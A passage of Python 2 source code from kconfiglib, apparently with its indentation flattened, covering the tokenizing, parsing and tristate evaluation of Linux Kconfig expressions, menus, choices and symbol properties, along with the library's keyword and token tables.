# 'continue' here would loop forever, since 'i' never advances)
break
if s[i + 1] != "|":
# Invalid characters are ignored
i += 1
continue
append(T_OR)
i += 2
elif c == "!":
if i + 1 >= strlen:
_tokenization_error(s, strlen, filename, linenr)
if s[i + 1] == "=":
append(T_UNEQUAL)
i += 2
else:
append(T_NOT)
i += 1
elif c == "=":
append(T_EQUAL)
i += 1
elif c == "(":
append(T_OPEN_PAREN)
i += 1
elif c == ")":
append(T_CLOSE_PAREN)
i += 1
elif c == "#":
break
else:
# Invalid characters are ignored
i += 1
continue
previous = tokens[-1]
return _Feed(tokens)
#
# Parsing
#
# Expression grammar:
#
# <expr> -> <symbol>
# <symbol> '=' <symbol>
# <symbol> '!=' <symbol>
# '(' <expr> ')'
# '!' <expr>
# <expr> '&&' <expr>
# <expr> '||' <expr>
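# As an example of the result format, the expression A && B || !C parses
# to (OR, [(AND, [A, B]), (NOT, C)]), where A, B, and C are Symbol
# instances.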
def _parse_expr(self,
feed,
cur_sym_or_choice,
line,
filename = None,
linenr = None,
transform_m = True):
"""Parse an expression from the tokens in 'feed' using a simple
top-down approach. The result has the form (<operator>, <list
containing parsed operands>).
feed -- _Feed instance containing the tokens for the expression.
cur_sym_or_choice -- The symbol or choice currently being parsed, or
None if we're not parsing a symbol or choice.
Used for recording references to symbols.
line -- The line containing the expression being parsed.
filename (default: None) -- The file containing the expression.
linenr (default: None) -- The line number containing the expression.
transform_m (default: True) -- Determines if 'm' should be rewritten to
'm && MODULES' -- see
parse_val_and_cond()."""
# Use instance variables to avoid having to pass these as arguments
# through the top-down parser in _parse_expr_2(), which is tedious and
# obfuscates the code. A profiler run shows no noticeable performance
# difference.
self.parse_expr_cur_sym_or_choice = cur_sym_or_choice
self.parse_expr_line = line
self.parse_expr_filename = filename
self.parse_expr_linenr = linenr
self.parse_expr_transform_m = transform_m
return self._parse_expr_2(feed)
def _parse_expr_2(self, feed):
or_terms = [self._parse_or_term(feed)]
# Keep parsing additional terms while the lookahead is '||'
while feed.check(T_OR):
or_terms.append(self._parse_or_term(feed))
return or_terms[0] if len(or_terms) == 1 else (OR, or_terms)
def _parse_or_term(self, feed):
and_terms = [self._parse_factor(feed)]
# Keep parsing additional terms while the lookahead is '&&'
while feed.check(T_AND):
and_terms.append(self._parse_factor(feed))
return and_terms[0] if len(and_terms) == 1 else (AND, and_terms)
def _parse_factor(self, feed):
if feed.check(T_OPEN_PAREN):
expr_parse = self._parse_expr_2(feed)
if not feed.check(T_CLOSE_PAREN):
_parse_error(self.parse_expr_line,
"missing end parenthesis.",
self.parse_expr_filename,
self.parse_expr_linenr)
return expr_parse
if feed.check(T_NOT):
return (NOT, self._parse_factor(feed))
sym_or_string = feed.get_next()
if not isinstance(sym_or_string, (Symbol, str)):
_parse_error(self.parse_expr_line,
"malformed expression.",
self.parse_expr_filename,
self.parse_expr_linenr)
if self.parse_expr_cur_sym_or_choice is not None and \
isinstance(sym_or_string, Symbol):
self.parse_expr_cur_sym_or_choice.referenced_syms.add(sym_or_string)
next_token = feed.peek_next()
# For conditional expressions ('depends on <expr>', '... if <expr>',
# etc.), "m" and m are rewritten to "m" && MODULES.
if next_token != T_EQUAL and next_token != T_UNEQUAL:
if self.parse_expr_transform_m and (sym_or_string is self.m or
sym_or_string == "m"):
return (AND, ["m", self._sym_lookup("MODULES")])
return sym_or_string
relation = EQUAL if (feed.get_next() == T_EQUAL) else UNEQUAL
sym_or_string_2 = feed.get_next()
if self.parse_expr_cur_sym_or_choice is not None and \
isinstance(sym_or_string_2, Symbol):
self.parse_expr_cur_sym_or_choice.referenced_syms.add(sym_or_string_2)
if sym_or_string is self.m:
sym_or_string = "m"
if sym_or_string_2 is self.m:
sym_or_string_2 = "m"
return (relation, sym_or_string, sym_or_string_2)
def _parse_file(self, filename, parent, deps, visible_if_deps, res = None):
"""Parse the Kconfig file 'filename'. The result is a _Block with all
items from the file. See _parse_block() for the meaning of the
parameters."""
line_feeder = _FileFeed(_get_lines(filename), filename)
return self._parse_block(line_feeder, None, parent, deps, visible_if_deps, res)
def _parse_block(self, line_feeder, end_marker, parent, deps,
visible_if_deps = None, res = None):
"""Parses a block, which is the contents of either a file or an if,
menu, or choice statement. The result is a _Block with the items from
the block.
end_marker -- The token that ends the block, e.g. T_ENDIF ("endif") for
if's. None for files.
parent -- The enclosing menu, choice or if, or None if we're at the top
level.
deps -- Dependencies from enclosing menus, choices and if's.
visible_if_deps (default: None) -- 'visible if' dependencies from
enclosing menus.
res (default: None) -- The _Block to add items to. If None, a new
_Block is created to hold the items."""
block = _Block() if res is None else res
filename = line_feeder.get_filename()
while 1:
# Do we already have a tokenized line that we determined wasn't
# part of whatever we were parsing earlier? See comment in
# Config.__init__().
if self.end_line is not None:
assert self.end_line_tokens is not None
tokens = self.end_line_tokens
tokens.go_to_start()
line = self.end_line
linenr = line_feeder.get_linenr()
self.end_line = None
self.end_line_tokens = None
else:
line = line_feeder.get_next()
if line is None:
if end_marker is not None:
raise Kconfig_Syntax_Error, (
"Unexpected end of file {0}."
.format(line_feeder.get_filename()))
return block
linenr = line_feeder.get_linenr()
tokens = self._tokenize(line, False, filename, linenr)
if tokens.is_empty():
continue
t0 = tokens.get_next()
# Have we reached the end of the block?
if t0 == end_marker:
return block
if t0 == T_CONFIG or t0 == T_MENUCONFIG:
# The tokenizer will automatically allocate a new Symbol object
# for any new names it encounters, so we don't need to worry
# about that here.
sym = tokens.get_next()
# Symbols defined in multiple places get the parent of their
# first definition. However, for symbols whose parents are choice
# statements, the choice statement takes precedence.
if not sym.is_defined_ or isinstance(parent, Choice):
sym.parent = parent
sym.is_defined_ = True
self.kconfig_syms.append(sym)
block.add_item(sym)
self._parse_properties(line_feeder, sym, deps, visible_if_deps)
elif t0 == T_MENU:
menu = Menu()
self.menus.append(menu)
menu.config = self
menu.parent = parent
menu.title = tokens.get_next()
menu.filename = filename
menu.linenr = linenr
# Parse properties and contents
self._parse_properties(line_feeder, menu, deps, visible_if_deps)
menu.block = self._parse_block(line_feeder,
T_ENDMENU,
menu,
menu.dep_expr,
_make_and(visible_if_deps,
menu.visible_if_expr))
block.add_item(menu)
elif t0 == T_IF:
# If statements are treated as syntactic sugar for adding
# dependencies to enclosed items and do not have an explicit
# object representation.
dep_expr = self._parse_expr(tokens, None, line, filename, linenr)
self._parse_block(line_feeder,
T_ENDIF,
parent,
_make_and(dep_expr, deps),
visible_if_deps,
block) # Add items to the same block
elif t0 == T_CHOICE:
# We support named choices
already_defined = False
name = None
if len(tokens) > 1 and isinstance(tokens[1], str):
name = tokens[1]
already_defined = name in self.named_choices
if already_defined:
choice = self.named_choices[name]
else:
choice = Choice()
self.choices.append(choice)
if name is not None:
choice.name = name
self.named_choices[name] = choice
choice.config = self
choice.parent = parent
choice.def_locations.append((filename, linenr))
# Parse properties and contents
self._parse_properties(line_feeder, choice, deps, visible_if_deps)
choice.block = self._parse_block(line_feeder,
T_ENDCHOICE,
choice,
None,
visible_if_deps)
choice._determine_actual_symbols()
# If no type is set for the choice, its type is that of the first
# choice item
if choice.type == UNKNOWN:
for item in choice.get_symbols():
if item.type != UNKNOWN:
choice.type = item.type
break
# Each choice item of UNKNOWN type gets the type of the choice
for item in choice.get_symbols():
if item.type == UNKNOWN:
item.type = choice.type
# For named choices defined in multiple locations, only record
# at the first definition
if not already_defined:
block.add_item(choice)
elif t0 == T_COMMENT:
comment = Comment()
comment.config = self
comment.parent = parent
comment.filename = filename
comment.linenr = linenr
comment.text = tokens.get_next()
self._parse_properties(line_feeder, comment, deps, visible_if_deps)
block.add_item(comment)
self.comments.append(comment)
elif t0 == T_SOURCE:
kconfig_file = tokens.get_next()
exp_kconfig_file = self._expand_sym_refs(kconfig_file)
f = os.path.join(self.base_dir, exp_kconfig_file)
if not os.path.exists(f):
raise IOError, ('{0}:{1}: sourced file "{2}" (expands to\n'
'"{3}") not found. Perhaps base_dir\n'
'(argument to Config.__init__(), currently\n'
'"{4}") is set to the wrong value.'
.format(filename,
linenr,
kconfig_file,
exp_kconfig_file,
self.base_dir))
# Add items to the same block
self._parse_file(f, parent, deps, visible_if_deps, block)
elif t0 == T_MAINMENU:
text = tokens.get_next()
if self.mainmenu_text is not None:
self._warn("overriding 'mainmenu' text. "
'Old value: "{0}", new value: "{1}".'
.format(self.mainmenu_text, text),
filename,
linenr)
self.mainmenu_text = text
else:
_parse_error(line, "unrecognized construct.", filename, linenr)
def _parse_properties(self, line_feeder, stmt, deps, visible_if_deps):
"""Parsing of properties for symbols, menus, choices, and comments."""
def parse_val_and_cond(tokens, line, filename, linenr):
"""Parses '<expr1> if <expr2>' constructs, where the 'if' part is
optional. Returns a tuple containing the parsed expressions, with
None as the second element if the 'if' part is missing."""
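# E.g., for the property line 'default FOO if BAR', this returns
# (FOO, BAR), with both elements being Symbol instances.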
val = self._parse_expr(tokens, stmt, line, filename, linenr, False)
if tokens.check(T_IF):
return (val, self._parse_expr(tokens, stmt, line, filename, linenr))
return (val, None)
# In case the symbol is defined in multiple locations, we need to
# remember what prompts, defaults, and selects are new for this
# definition, as "depends on" should only apply to the local
# definition.
new_prompt = None
new_def_exprs = []
new_selects = []
# Dependencies from 'depends on' statements
depends_on_expr = None
while 1:
line = line_feeder.get_next()
if line is None:
break
filename = line_feeder.get_filename()
linenr = line_feeder.get_linenr()
tokens = self._tokenize(line, False, filename, linenr)
if tokens.is_empty():
continue
t0 = tokens.get_next()
if t0 == T_HELP:
# Find first non-empty line and get its indentation
line_feeder.remove_while(str.isspace)
line = line_feeder.get_next()
if line is None:
stmt.help = ""
break
indent = _indentation(line)
# If the first non-empty line has zero indent, there is no
# help text
if indent == 0:
stmt.help = ""
line_feeder.go_back()
break
help_lines = [_deindent(line, indent)]
# The help text goes on till the first non-empty line with less
# indent
while 1:
line = line_feeder.get_next()
if (line is None) or \
(not line.isspace() and _indentation(line) < indent):
stmt.help = "".join(help_lines)
break
help_lines.append(_deindent(line, indent))
if line is None:
break
line_feeder.go_back()
elif t0 == T_PROMPT:
# 'prompt' properties override each other within a single
# definition of a symbol, but additional prompts can be added
# by defining the symbol multiple times; hence 'new_prompt'
# instead of 'prompt'.
new_prompt = parse_val_and_cond(tokens, line, filename, linenr)
elif t0 == T_DEFAULT:
new_def_exprs.append(parse_val_and_cond(tokens, line, filename, linenr))
elif t0 == T_DEPENDS:
if not tokens.check(T_ON):
_parse_error(line, 'expected "on" after "depends".', filename, linenr)
parsed_deps = self._parse_expr(tokens, stmt, line, filename, linenr)
if isinstance(stmt, (Menu, Comment)):
stmt.dep_expr = _make_and(stmt.dep_expr, parsed_deps)
else:
depends_on_expr = _make_and(depends_on_expr, parsed_deps)
elif t0 == T_VISIBLE:
if not tokens.check(T_IF):
_parse_error(line, 'expected "if" after "visible".', filename, linenr)
if not isinstance(stmt, Menu):
_parse_error(line,
"'visible if' is only valid for menus.",
filename,
linenr)
parsed_deps = self._parse_expr(tokens, stmt, line, filename, linenr)
stmt.visible_if_expr = _make_and(stmt.visible_if_expr, parsed_deps)
elif t0 == T_SELECT:
target = tokens.get_next()
stmt.referenced_syms.add(target)
stmt.selected_syms.add(target)
if tokens.check(T_IF):
new_selects.append((target,
self._parse_expr(tokens, stmt, line, filename, linenr)))
else:
new_selects.append((target, None))
elif t0 in (T_BOOL, T_TRISTATE, T_INT, T_HEX, T_STRING):
stmt.type = token_to_type[t0]
if len(tokens) > 1:
new_prompt = parse_val_and_cond(tokens, line, filename, linenr)
elif t0 == T_RANGE:
lower = tokens.get_next()
upper = tokens.get_next()
stmt.referenced_syms.add(lower)
stmt.referenced_syms.add(upper)
if tokens.check(T_IF):
stmt.ranges.append((lower, upper,
self._parse_expr(tokens, stmt, line, filename, linenr)))
else:
stmt.ranges.append((lower, upper, None))
elif t0 == T_DEF_BOOL:
stmt.type = BOOL
if len(tokens) > 1:
new_def_exprs.append(parse_val_and_cond(tokens, line, filename, linenr))
elif t0 == T_DEF_TRISTATE:
stmt.type = TRISTATE
if len(tokens) > 1:
new_def_exprs.append(parse_val_and_cond(tokens, line, filename, linenr))
elif t0 == T_OPTIONAL:
if not isinstance(stmt, Choice):
_parse_error(line,
'"optional" is only valid for choices.',
filename,
linenr)
stmt.optional = True
elif t0 == T_OPTION:
if tokens.check(T_ENV) and tokens.check(T_EQUAL):
env_var = tokens.get_next()
stmt.is_special_ = True
stmt.is_from_env = True
if env_var not in os.environ:
self._warn("""
The symbol {0} references the non-existent environment variable {1} and will
get the empty string as its value.
If you're using kconfiglib via 'make (i)scriptconfig' it should have set up the
environment correctly for you. If you still got this message, that might be an
error, and you should e-mail kconfiglib@gmail.com.
.""" .format(stmt.name, env_var),
filename,
linenr)
stmt.cached_value = ""
else:
stmt.cached_value = os.environ[env_var]
elif tokens.check(T_DEFCONFIG_LIST):
self.defconfig_sym = stmt
elif tokens.check(T_MODULES):
self._warn("the 'modules' option is not supported. "
"Let me know if this is a problem for you; "
"it shouldn't be that hard to implement.",
filename,
linenr)
else:
_parse_error(line, "unrecognized option.", filename, linenr)
else:
# See comment in Config.__init__()
self.end_line = line
self.end_line_tokens = tokens
break
# Propagate dependencies from enclosing menus and if's.
# For menus and comments..
if isinstance(stmt, (Menu, Comment)):
stmt.orig_deps = stmt.dep_expr
stmt.deps_from_containing = deps
stmt.dep_expr = _make_and(stmt.dep_expr, deps)
stmt.all_referenced_syms = \
stmt.referenced_syms | _get_expr_syms(deps)
# For symbols and choices..
else:
# See comment for 'menu_dep'
stmt.menu_dep = depends_on_expr
# Propagate dependencies specified with 'depends on' to any new
# default expressions, prompts, and selections. ("New" since a
# symbol might be defined in multiple places and the dependencies
# should only apply to the local definition.)
new_def_exprs = [(val_expr, _make_and(cond_expr, depends_on_expr))
for (val_expr, cond_expr) in new_def_exprs]
new_selects = [(target, _make_and(cond_expr, depends_on_expr))
for (target, cond_expr) in new_selects]
if new_prompt is not None:
prompt, cond_expr = new_prompt
# 'visible if' dependencies from enclosing menus get propagated
# to prompts
if visible_if_deps is not None:
cond_expr = _make_and(cond_expr, visible_if_deps)
new_prompt = (prompt, _make_and(cond_expr, depends_on_expr))
# We save the original expressions -- before any menu and if
# conditions have been propagated -- so these can be retrieved
# later.
stmt.orig_def_exprs.extend(new_def_exprs)
if new_prompt is not None:
stmt.orig_prompts.append(new_prompt)
# Only symbols can select
if isinstance(stmt, Symbol):
stmt.orig_selects.extend(new_selects)
# Save dependencies from enclosing menus and if's
stmt.deps_from_containing = deps
# The set of symbols referenced directly by the symbol/choice plus
# all symbols referenced by enclosing menus and if's.
stmt.all_referenced_syms = \
stmt.referenced_syms | _get_expr_syms(deps)
# Propagate dependencies from enclosing menus and if's
stmt.def_exprs.extend([(val_expr, _make_and(cond_expr, deps))
for (val_expr, cond_expr) in new_def_exprs])
for (target, cond) in new_selects:
target.rev_dep = _make_or(target.rev_dep,
_make_and(stmt,
_make_and(cond, deps)))
if new_prompt is not None:
prompt, cond_expr = new_prompt
stmt.prompts.append((prompt, _make_and(cond_expr, deps)))
#
# Symbol table manipulation
#
def _sym_lookup(self, name, add_sym_if_not_exists = True):
"""Fetches the symbol 'name' from the symbol table, optionally adding
it if it does not exist (this is usually what we want)."""
if name in self.syms:
return self.syms[name]
new_sym = Symbol()
new_sym.config = self
new_sym.name = name
if add_sym_if_not_exists:
self.syms[name] = new_sym
else:
# This warning is generated while evaluating an expression
# containing undefined symbols using Config.eval()
self._warn("no symbol {0} in configuration".format(name))
return new_sym
#
# Evaluation of symbols and expressions
#
def _eval_expr(self, expr):
"""Evaluates an expression and returns one of the tristate values "n",
"m" or "y"."""
res = self._eval_expr_2(expr)
# Promote "m" to "y" if we're running without modules. Internally, "m"
# is often rewritten to "m" && MODULES by both the C implementation and
# kconfiglib, which takes care of cases where "m" should be false if
# we're running without modules.
if res == "m" and not self._has_modules():
return "y"
return res
def _eval_expr_2(self, expr):
if expr is None:
return "y"
if isinstance(expr, Symbol):
# Non-bool/tristate symbols are always "n" in a tristate sense,
# regardless of their value
if expr.type != BOOL and expr.type != TRISTATE:
return "n"
return expr.get_value()
if isinstance(expr, str):
return expr if (expr == "y" or expr == "m") else "n"
first_expr = expr[0]
if first_expr == OR:
res = "n"
for subexpr in expr[1]:
ev = self._eval_expr_2(subexpr)
# Return immediately upon discovering a "y" term
if ev == "y":
return "y"
if ev == "m":
res = "m"
# 'res' is either "n" or "m" here; we already handled the
# short-circuiting "y" case in the loop.
return res
if first_expr == AND:
res = "y"
for subexpr in expr[1]:
ev = self._eval_expr_2(subexpr)
# Return immediately upon discovering an "n" term
if ev == "n":
return "n"
if ev == "m":
res = "m"
# 'res' is either "m" or "y" here; we already handled the
# short-circuiting "n" case in the loop.
return res
if first_expr == NOT:
ev = self._eval_expr_2(expr[1])
if ev == "y":
return "n"
return "y" if (ev == "n") else "m"
if first_expr == EQUAL:
return "y" if (self._get_str_value(expr[1]) ==
self._get_str_value(expr[2])) else "n"
if first_expr == UNEQUAL:
return "y" if (self._get_str_value(expr[1]) !=
self._get_str_value(expr[2])) else "n"
_internal_error("Internal error while evaluating expression: "
"unknown operation {0}.".format(first_expr))
def _get_str_value(self, obj):
if isinstance(obj, str):
return obj
# obj is a Symbol
return obj.get_value()
def _eval_min(self, e1, e2):
e1_eval = self._eval_expr(e1)
e2_eval = self._eval_expr(e2)
return e1_eval if tri_less(e1_eval, e2_eval) else e2_eval
def _eval_max(self, e1, e2):
e1_eval = self._eval_expr(e1)
e2_eval = self._eval_expr(e2)
return e1_eval if tri_greater(e1_eval, e2_eval) else e2_eval
#
# Methods related to the MODULES symbol
#
def _has_modules(self):
modules_sym = self.syms.get("MODULES")
return (modules_sym is not None) and (modules_sym.get_value() == "y")
#
# Dependency tracking
#
def _build_dep(self):
"""Populates the Symbol.dep sets, linking the symbol to the symbols
that immediately depend on it in the sense that changing the value of
the symbol might affect the values of those other symbols. This is used
for caching/invalidation purposes. The calculated sets might be larger
than necessary as we don't do any complicated analysis of the
expressions."""
for sym in self.syms.itervalues():
sym.dep = set()
# Adds 'sym' as a directly dependent symbol to all symbols that appear
# in the expression 'e'
def add_expr_deps(e, sym):
for s in _get_expr_syms(e):
s.dep.add(sym)
# The directly dependent symbols of a symbol are:
# - Any symbols whose prompts, default values, rev_dep (select
# condition), or ranges depend on the symbol
# - Any symbols that belong to the same choice statement as the symbol
# (these won't be included in 'dep' as that makes the dependency
# graph unwieldy, but Symbol._get_dependent() will include them)
# - Any symbols in a choice statement that depends on the symbol
for sym in self.syms.itervalues():
for (_, e) in sym.prompts:
add_expr_deps(e, sym)
for (v, e) in sym.def_exprs:
add_expr_deps(v, sym)
add_expr_deps(e, sym)
add_expr_deps(sym.rev_dep, sym)
for (l, u, e) in sym.ranges:
add_expr_deps(l, sym)
add_expr_deps(u, sym)
add_expr_deps(e, sym)
if sym.is_choice_symbol_:
choice = sym.parent
for (_, e) in choice.prompts:
add_expr_deps(e, sym)
for (_, e) in choice.def_exprs:
add_expr_deps(e, sym)
def _expr_val_str(self, expr, no_value_str = "(none)", get_val_instead_of_eval = False):
# Since values are valid expressions, _expr_to_str() will get a nice
# string representation for those as well.
if expr is None:
return no_value_str
if get_val_instead_of_eval:
if isinstance(expr, str):
return _expr_to_str(expr)
val = expr.get_value()
else:
val = self._eval_expr(expr)
return "{0} (value: {1})".format(_expr_to_str(expr), _expr_to_str(val))
def _expand_sym_refs(self, s):
"""Expands $-references to symbols in 's' to symbol values, or to the
empty string for undefined symbols."""
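# E.g., if the symbol ARCH has the value "x86", then
# _expand_sym_refs("arch/$ARCH/Kconfig") returns "arch/x86/Kconfig".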
while 1:
sym_ref_re_match = sym_ref_re.search(s)
if sym_ref_re_match is None:
return s
sym_name = sym_ref_re_match.group(0)[1:]
sym = self.syms.get(sym_name)
expansion = "" if sym is None else sym.get_value()
s = s[:sym_ref_re_match.start()] + \
expansion + \
s[sym_ref_re_match.end():]
def _get_sym_or_choice_str(self, sc):
"""Symbols and choices have many properties in common, so we factor out
common __str__() stuff here. "sc" is short for "symbol or choice"."""
# As we deal a lot with string representations here, use some
# convenient shorthand:
s = _expr_to_str
#
# Common symbol/choice properties
#
user_value_str = "(no user value)" if sc.user_val is None else s(sc.user_val)
visibility_str = s(sc.get_visibility())
# Build prompts string
if sc.prompts == []:
prompts_str = " (no prompts)"
else:
prompts_str_rows = []
for (prompt, cond_expr) in sc.orig_prompts:
if cond_expr is None:
prompts_str_rows.append(' "{0}"'.format(prompt))
else:
prompts_str_rows.append(' "{0}" if '.format(prompt) +
self._expr_val_str(cond_expr))
prompts_str = "\n".join(prompts_str_rows)
# Build locations string
if sc.def_locations == []:
locations_str = "(no locations)"
else:
locations_str = " ".join(["{0}:{1}".format(filename, linenr) for
(filename, linenr) in sc.def_locations])
# Build additional-dependencies-from-menus-and-if's string
additional_deps_str = " " + self._expr_val_str(sc.deps_from_containing,
"(no additional dependencies)")
#
# Symbol-specific stuff
#
if isinstance(sc, Symbol):
# Build value string
value_str = s(sc.get_value())
# Build ranges string
if sc.ranges == []:
ranges_str = " (no ranges)"
else:
ranges_str_rows = []
for (l, u, cond_expr) in sc.ranges:
if cond_expr is None:
ranges_str_rows.append(" [{0}, {1}]".format(s(l), s(u)))
else:
ranges_str_rows.append(" [{0}, {1}] if {2}"
.format(s(l), s(u), self._expr_val_str(cond_expr)))
ranges_str = "\n".join(ranges_str_rows)
# Build default values string
if sc.def_exprs == []:
defaults_str = " (no default values)"
else:
defaults_str_rows = []
for (val_expr, cond_expr) in sc.orig_def_exprs:
row_str = " " + self._expr_val_str(val_expr, "(none)", sc.type == STRING)
defaults_str_rows.append(row_str)
defaults_str_rows.append(" Condition: " + self._expr_val_str(cond_expr))
defaults_str = "\n".join(defaults_str_rows)
# Build selects string
if sc.orig_selects == []:
selects_str = " (no selects)"
else:
selects_str_rows = []
for (target, cond_expr) in sc.orig_selects:
if cond_expr is None:
selects_str_rows.append(" {0}".format(target.name))
else:
selects_str_rows.append(" {0} if ".format(target.name) +
self._expr_val_str(cond_expr))
selects_str = "\n".join(selects_str_rows)
# Build reverse dependencies string
if sc.rev_dep == "n":
rev_dep_str = " (no reverse dependencies)"
else:
rev_dep_str = " " + self._expr_val_str(sc.rev_dep)
res = _sep_lines("Symbol " + (sc.name if sc.name is not None else "(no name)"),
"Type : " + typename[sc.type],
"Value : " + value_str,
"User value : " + user_value_str,
"Visibility : " + visibility_str,
"Is choice item : " + bool_str[sc.is_choice_symbol_],
"Is defined : " + bool_str[sc.is_defined_],
"Is from env. : " + bool_str[sc.is_from_env],
"Is special : " + bool_str[sc.is_special_] + "\n")
if sc.ranges != []:
res += _sep_lines("Ranges:",
ranges_str + "\n")
res += _sep_lines("Prompts:",
prompts_str,
"Default values:",
defaults_str,
"Selects:",
selects_str,
"Reverse dependencies:",
rev_dep_str,
"Additional dependencies from enclosing menus and if's:",
additional_deps_str,
"Locations: " + locations_str)
return res
#
# Choice-specific stuff
#
# Build name string (for named choices)
if sc.name is None:
name_str = "(no name)"
else:
name_str = sc.name
# Build selected symbol string
sel = sc.get_selection()
if sel is None:
sel_str = "(no selection)"
else:
sel_str = sel.name
# Build mode string
mode_str = s(sc.get_mode())
# Build default values string
if sc.def_exprs == []:
defaults_str = " (no default values)"
else:
defaults_str_rows = []
for (sym, cond_expr) in sc.orig_def_exprs:
if cond_expr is None:
defaults_str_rows.append(" {0}".format(sym.name))
else:
defaults_str_rows.append(" {0} if ".format(sym.name) +
self._expr_val_str(cond_expr))
defaults_str = "\n".join(defaults_str_rows)
# Build contained symbols string
names = [sym.name for sym in sc.get_symbols()]
if names == []:
syms_string = "(empty)"
else:
syms_string = " ".join(names)
return _sep_lines("Choice",
"Name (for named choices): " + name_str,
"Type : " + typename[sc.type],
"Selected symbol : " + sel_str,
"User value : " + user_value_str,
"Mode : " + mode_str,
"Visibility : " + visibility_str,
"Optional : " + bool_str[sc.optional],
"Prompts:",
prompts_str,
"Defaults:",
defaults_str,
"Choice symbols:",
" " + syms_string,
"Additional dependencies from enclosing menus and if's:",
additional_deps_str,
"Locations: " + locations_str)
def _expr_depends_on(self, expr, sym):
"""Reimplementation of expr_depends_symbol() from mconf.c. Used to
determine if a submenu should be implicitly created, which influences what
items inside choice statements are considered choice items."""
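# E.g., the expression A && (B = "y") is considered to depend on both A
# and B, while !A is not considered to depend on A (NOT is not handled,
# matching the C implementation).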
if expr is None:
return False
def rec(expr):
if isinstance(expr, str):
return False
if isinstance(expr, Symbol):
return expr is sym
e0 = expr[0]
if e0 == EQUAL or e0 == UNEQUAL:
return self._eq_to_sym(expr) is sym
if e0 == AND:
for and_expr in expr[1]:
if rec(and_expr):
return True
return False
return rec(expr)
def _eq_to_sym(self, eq):
"""_expr_depends_on() helper. For (in)equalities of the form sym = y/m
or sym != n, returns sym. For other (in)equalities, returns None."""
relation, left, right = eq
left = self._transform_n_m_y(left)
right = self._transform_n_m_y(right)
# Make sure the symbol (if any) appears to the left
if not isinstance(left, Symbol):
left, right = right, left
if not isinstance(left, Symbol):
return None
if (relation == EQUAL and (right == "m" or right == "y")) or \
(relation == UNEQUAL and right == "n"):
return left
return None
def _transform_n_m_y(self, item):
"""_eq_to_sym() helper. Translates the symbols n, m, and y to their
string equivalents."""
if item is self.n:
return "n"
if item is self.m:
return "m"
if item is self.y:
return "y"
return item
def _warn(self, msg, filename = None, linenr = None):
"""For printing warnings to stderr."""
if self.print_warnings:
self._warn_or_undef_assign(msg, WARNING, filename, linenr)
def _undef_assign(self, msg, filename = None, linenr = None):
"""For printing informational messages related to assignments
to undefined symbols to stderr."""
if self.print_undef_assign:
self._warn_or_undef_assign(msg, UNDEF_ASSIGN, filename, linenr)
def _warn_or_undef_assign(self, msg, msg_type, filename, linenr):
if filename is not None:
sys.stderr.write("{0}:".format(_clean_up_path(filename)))
if linenr is not None:
sys.stderr.write("{0}:".format(linenr))
if msg_type == WARNING:
sys.stderr.write("warning: ")
elif msg_type == UNDEF_ASSIGN:
sys.stderr.write("info: ")
else:
_internal_error('Internal error while printing warning: unknown warning type "{0}".'
.format(msg_type))
sys.stderr.write(msg + "\n")
def _get_expr_syms(expr):
"""Returns the set() of symbols appearing in expr."""
res = set()
if expr is None:
return res
def rec(expr):
if isinstance(expr, Symbol):
res.add(expr)
return
if isinstance(expr, str):
return
e0 = expr[0]
if e0 == OR or e0 == AND:
for term in expr[1]:
rec(term)
elif e0 == NOT:
rec(expr[1])
elif e0 == EQUAL or e0 == UNEQUAL:
_, v1, v2 = expr
if isinstance(v1, Symbol):
res.add(v1)
if isinstance(v2, Symbol):
res.add(v2)
else:
_internal_error("Internal error while fetching symbols from an "
"expression with token stream {0}.".format(expr))
rec(expr)
return res
#
# Construction of expressions
#
# These functions as well as the _eval_min/max() functions above equate
# None with "y", which is usually what we want, but needs to be kept in
# mind.
def _make_or(e1, e2):
# Perform trivial simplification and avoid None's (which
# correspond to y's)
if e1 is None or e2 is None or \
e1 == "y" or e2 == "y":
return "y"
if e1 == "n":
return e2
if e2 == "n":
return e1
# Prefer to merge/update argument list if possible instead of creating
# a new OR node
if isinstance(e1, tuple) and e1[0] == OR:
if isinstance(e2, tuple) and e2[0] == OR:
return (OR, e1[1] + e2[1])
return (OR, e1[1] + [e2])
if isinstance(e2, tuple) and e2[0] == OR:
return (OR, e2[1] + [e1])
return (OR, [e1, e2])
# Note: returns None if e1 == e2 == None
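# For example, _make_and("y", e) simply returns e, and AND nodes are
# merged rather than nested: _make_and((AND, [e1, e2]), e3) gives
# (AND, [e1, e2, e3]) for a plain e3.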
def _make_and(e1, e2):
if e1 == "n" or e2 == "n":
return "n"
if e1 is None or e1 == "y":
return e2
if e2 is None or e2 == "y":
return e1
# Prefer to merge/update argument list if possible instead of creating
# a new AND node
if isinstance(e1, tuple) and e1[0] == AND:
if isinstance(e2, tuple) and e2[0] == AND:
return (AND, e1[1] + e2[1])
return (AND, e1[1] + [e2])
if isinstance(e2, tuple) and e2[0] == AND:
return (AND, e2[1] + [e1])
return (AND, [e1, e2])
#
# Constants and functions related to types, parsing, evaluation and printing,
# put globally to unclutter the Config class a bit.
#
# Tokens
(T_OR, T_AND, T_NOT,
T_OPEN_PAREN, T_CLOSE_PAREN,
T_EQUAL, T_UNEQUAL,
T_MAINMENU, T_MENU, T_ENDMENU,
T_SOURCE, T_CHOICE, T_ENDCHOICE,
T_COMMENT, T_CONFIG, T_MENUCONFIG,
T_HELP, T_IF, T_ENDIF, T_DEPENDS, T_ON,
T_OPTIONAL, T_PROMPT, T_DEFAULT,
T_BOOL, T_TRISTATE, T_HEX, T_INT, T_STRING,
T_DEF_BOOL, T_DEF_TRISTATE,
T_SELECT, T_RANGE, T_OPTION, T_ENV,
T_DEFCONFIG_LIST, T_MODULES, T_VISIBLE) = range(0, 38)
# Keyword to token map
keywords = {
"mainmenu" : T_MAINMENU,
"menu" : T_MENU,
"endmenu" : T_ENDMENU,
"endif" : T_ENDIF,
"endchoice" : T_ENDCHOICE,
"source" : T_SOURCE,
"choice" : T_CHOICE,
"config" : T_CONFIG,
"comment" : T_COMMENT,
"menuconfig" : T_MENUCONFIG,
"help" : T_HELP,
"if" : T_IF,
"depends" : T_DEPENDS,
"on" : T_ON,
"optional" : T_OPTIONAL,
"prompt" : T_PROMPT,
"default" : T_DEFAULT,
"bool" : T_BOOL,
"boolean" : T_BOOL,
"tristate" : T_TRISTATE,
"int" : T_INT,
"hex" : T_HEX,
"def_bool" : T_DEF_BOOL,
"def_tristate" : T_DEF_TRISTATE,
"string" : T_STRING,
"select" : T_SELECT,
"range" : T_RANGE,
"option" : T_OPTION,
"env" : T_ENV,
"defconfig_list" : T_DEFCONFIG_LIST,
"modules" : T_MODULES,
"visible" : T_VISIBLE }
# Strings to use for True and False
bool_str = { False : "false", True : "true" }
